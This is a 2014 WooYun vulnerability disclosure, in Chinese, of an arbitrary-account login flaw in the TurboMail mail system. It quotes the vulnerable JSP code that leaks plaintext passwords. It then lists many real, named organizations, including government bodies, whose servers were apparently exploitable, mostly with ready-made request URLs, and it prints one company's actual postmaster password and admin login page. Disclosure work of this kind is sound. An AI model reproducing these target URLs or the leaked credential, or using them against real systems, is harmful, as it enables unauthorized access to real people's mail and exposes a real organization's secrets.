TurboMail邮件系统任意账号登录漏洞（附众多案例）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-078331

漏洞标题：TurboMail邮件系统任意账号登录漏洞（附众多案例）

漏洞作者： error

提交时间：2014-10-04 21:24

修复时间：2015-01-02 21:26

公开时间：2015-01-02 21:26

漏洞类型：非授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-10-04：细节已通知厂商并且等待厂商处理中
2014-10-11：厂商已经确认，细节仅向厂商公开
2014-10-14：细节向第三方安全合作伙伴开放
2014-12-05：细节向核心白帽子及相关领域专家公开
2014-12-15：细节向普通白帽子公开
2014-12-25：细节向实习白帽子公开
2015-01-02：细节向公众公开

简要描述：

TurboMail邮件系统某处接口验证不严，导致任意账号登陆漏洞，同时还泄露账号的明文密码。

详细说明：

官网：http://www.turbomail.org/
百度搜索：Powered by TurboMail 可以发现用户量还是很大的
漏洞文件：/nicknamelogin.jsp

漏洞代码如下：
<%    
    //传入的是昵称
    String name = request.getParameter("name");
	name = Util.formatRequest(name,MailMain.s_os,"GBK"); 
     
	//http://localhost:8080/mailmain?type=login&uid=test&pwd=test&domain=test.com
	String uid = null;
	String domain = null;
	String pwd = null;
	
	UserAccountList ual = new UserAccountList();
	try {
		ual.init(null, 0, null, 0,
				MailMain.s_config.UsersPerPage, 1, null,
				"first_name", name, null,true);
		int iSize = ual.alUserAccount.size();
		if (iSize > 0) {
			UserAccount ua = (UserAccount) ual.alUserAccount
					.get(0);
			
			if(ua != null){
				uid = ua.username;
				domain = ua.m_domain;
				pwd = ua.getOrgPassword();
			}
		}
	} catch (Exception e) {
	}
	if(uid != null){
		response.sendRedirect("mailmain?type=login&uid=" + uid + "&pwd="+ pwd + "&domain=" + domain + "&style=enterprise");
	}else{
		%>找不到该用户<%	
	}
%>

代码实现上仅仅通过参数name来查询邮箱用户信息，如果存在就将该用户的标示uid = ua.username;用户的域domain = ua.m_domain;用户的明文密码pwd = ua.getOrgPassword();直接取出，然后使用这些信息进行重定向到登录界面mailmain?type=login&uid=&pwd=&domain=

整个过程确实密码的验证，只是简单的判断了下是否存在给定的邮箱账号，导致任意邮箱账号登录，同时在这个过程中还直接泄露了该邮箱账号对于的域名domain和明文密码等敏感信息。

通过直接访问/nicknamelogin.jsp页面，即不给name赋值，默认会返回邮箱账号的第一个账号

漏洞证明：

测试案例：
http://chinagrain.gov.cn:100/nicknamelogin.jsp	国家粮食局


http://58.42.230.121/nicknamelogin.jsp?name=postmaster    贵州省煤矿设计研究院



http://218.206.233.148/nicknamelogin.jsp        河南省人民政府国有资产监督管理委员会



http://113.11.196.145/nicknamelogin.jsp?name=postmaster 东方银行业高级管理人员研修院



http://mail.dcc-bj.com/nicknamelogin.jsp?name=postmaster



虽然登录失败，但是返回的url链接直接泄露明文密码：http://mail.dcc-bj.com/mailmain?type=login&uid=postmaster&pwd=S!r+v1538dcc&domain=root&style=enterprise
使用获取到的postmaster账号密码S!r+v1538dcc到域管理页面登陆: http://mail.dcc-bj.com/maintlogin.jsp



http://59.108.58.99/nicknamelogin.jsp



http://124.205.74.197/nicknamelogin.jsp        



http://mail.slxinke.com:8080/nicknamelogin.jsp



http://mail.mymovies.com.cn/nicknamelogin.jsp



http://mail.henan-cdt.com/nicknamelogin.jsp



http://mail.fseet.com/nicknamelogin.jsp



http://mail.jdjt.net/nicknamelogin.jsp



http://mail.ibuonline.com/nicknamelogin.jsp



http://mail.ieds.com.cn/nicknamelogin.jsp




http://mail.cttsx.com/nicknamelogin.jsp
http://pop3.avictc.com/nicknamelogin.jsp?name=postmaster